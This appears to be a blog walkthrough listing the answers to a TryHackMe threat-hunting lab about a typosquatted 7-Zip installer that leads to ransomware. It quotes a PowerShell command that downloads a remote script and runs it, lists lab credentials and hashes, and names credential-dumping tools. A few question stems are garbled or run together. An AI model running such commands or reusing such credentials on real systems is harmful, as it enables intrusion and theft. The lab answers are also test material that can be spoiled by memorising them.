We covered a scenario of Windows machine compromised with a fake 7z archiving tools designed to infect machines with Windows installer files that in turn download the ransomware from C2 servers using Powershell. The scenario discussed in the video involves the investigation of network and endpoint logs dumped from the compromised machine to hunt the indicated threats and extract the indicators of compromise. This was part of TryHackMe Hunt Me II: Typo Squatters room.
The scenario
Just working on a typical day as a software engineer, Perry received an encrypted 7z archive from his boss containing a snippet of a source code that must be completed within the day. Realising that his current workstation does not have an application that can unpack the file, he spins up his browser and starts to search for software that can aid in accessing the file. Without validating the resource, Perry immediately clicks the first search engine result and installs the application.
Last September 26, 2023, one of the security analysts observed something unusual on the workstation owned by Perry based on the generated endpoint and network logs. Given this, your SOC lead has assigned you to conduct an in-depth investigation on this workstation and assess the impact of the potential compromise.
Check out the video below for detailed explanation.
Room Answers | TryHackMe Hunt Me I: Payment Collectors
What is the URL of the malicious software that was downloaded by the victim user?
http://www.7zipp.org/a/7z2301-x64.msi
What isWhat is the IP address of the domain hosting the malware?
206.189.34.218
What is the PID of the process that executed the malicious software?
2532
Following the execution chain of the malicious payload, another remote file was downloaded and executed. What is the full command line value of this suspicious activity?
powershell.exe iex(iwr http://www.7zipp.org/a/7z.ps1 -useb)
The newly downloaded script also installed the legitimate version of the application. What is the full file path of the legitimate installer?
C:\Windows\Temp\7zlegit.exe
What is the name of the service that was installed?
7zService
The attacker was able to establish a C2 connection after starting the implanted service. What is the username of the account that executed the service?
SYSTEM
WAfter dumping LSASS data, the attacker attempted to parse the data to harvest the credentials. What is the name of the tool used by the attacker in this activity?
Invoke-PowerExtract
What is the credential pair that the attacker leveraged after the credential dumping activity? (format: username:hash)
james.cromwell:B852A0B8BD4E00564128E0A5EA2BC4CF
After gaining access to the new account, the attacker attempted to reset the credentials of another user. What is the new password set to this target account?
pwn3dpw!!!
What is the name of the workstation where the new account was used?
WKSTN-02
After gaining access to the new workstation, a new set of credentials was discovered. What is the username, including its domain, and password of this new account?
SSF\itadmin:NoO6@39Sk0!
Aside from mimikatz, what is the name of the PowerShell script used to dump the hash of the domain admin?
Invoke-SharpKatz.ps1
The attacker exfiltrated an additional file from the victim’s workstation. What is the flag you receive after rWhat is the AES256 hash of the domain admin based on the credential dumping output?
f28a16b8d3f5163cb7a7f7ed2c8f2cf0419f0b0c2e28c15f831d050f5edaa534
After gaining domain admin access, the attacker popped ransomware on workstations. How many files were encrypted on all workstations?
46
Video Walkthrough | TryHackMe Hunt Me II: Typo Squatters
